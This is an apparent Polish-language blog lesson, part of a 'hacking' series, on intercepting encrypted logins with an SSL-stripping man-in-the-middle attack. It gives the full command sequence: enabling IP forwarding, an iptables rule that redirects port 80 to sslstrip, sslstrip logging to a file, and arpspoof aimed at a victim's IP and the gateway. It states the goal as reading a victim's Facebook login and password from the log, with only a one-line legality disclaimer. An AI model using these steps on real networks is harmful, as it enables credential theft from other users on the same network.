hacking: 2.dane szyfrowane SSL

Cześć!!Na poprzedniej lekcji mówiłem,że kiedyś powiemy sobie o szyfrowaniu SSL dzisiaj pokażę ci w praktyce i wytłumaczę na czym polega szyfrowanie SSL,po tej lekcji będziesz mógł przejąć dane szyfrowane ofiary np jej login i hasło na facebooka,oczywiście po tej lekcji eksperymentuj tylko u siebie,ponieważ wykradanie danych jest przestępstwem.Niestety ten sposób działa tylko w przegladarce explorer,ponieważ chcę ci pokazać tylko jak mniej więcej to wygląda, więc do dzieła!!

Żeby przechwycić dane szyfrowane,użyjemy programu SSLStrip,istnieje też inny sposób,atak typu SSL MITM(man in the middle),ale nie będziemy go używać ponieważ ostrzega on użytkownika o niebezpiecznym połączeniu,więc jest mniej skuteczny,program SSLStrip którego użyjemy, on zmienia tylko początek adresu strony https na http,co jest dla użytkownika praktycznie niezauważalne.

Włącz więc terminal w kalilinusksie i wpisz w konsoli polecenie echo 1 > /proc/sys/net/ipv4/ip_forward to polecenie opisałem w lekcji o przechwytywaniu pakietów arp jak nie wiesz jaką funkcję pełni tp polecenie to najpierw zajrzyj do tamtej lekcji.

Następnie w terminalu musisz wpisać polecenie iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080 to polecenie tworzy regułę dla zapory sieciowej iptables która bedzie powodowała przekierowanie ruchu z portu 80 do programu SSLStrip.Ja uruchomię program SSLStrip na porcie 8080, jeśli chcesz wiedzieć jakie IP ma twoja brama sieciowa to wpisz route -n są tam też inne parametry,ale nie musisz ich do tej lekcji znać.

Teraz włącz program SSLStrip i zapisz dane do folderu podglad.txt poleceniem sslstrip -l 8080 -f -w podglad.txt

Jeszcze zanim bedziemy przechwytywać dane szyfrowane musimy podszyć się pod bramę sieciową,uruchom nowy terminal,ale nie zamykaj tamtego i wpisz polecenie arpspoof -i eth0 -t ip ofiary ip bramysieciowej w moim przypadku było to arpspoof -i eth0 -t 192.168.1.199 192.168.1.1

I teraz włącz naszą ukochaną przeglądarkę explorer i wejdż na facebooka,powinieneś zobaczyć taki adres z początkiem http jak u mnie.

Teraz gdyby ofiara sie zalogowała,i chciałbyś zobaczyć jej adres i hasło wpisz polecenie w nowym terminalu cat podglad.txt

Dzisiaj to by było na tyle,do zobaczenia na następnej lekcji!

 
Jeśli ten wpis ci się przydał podziel się nim ze swoimi znajomymi :)

Post a comment

avatar
  Subscribe  
Notify about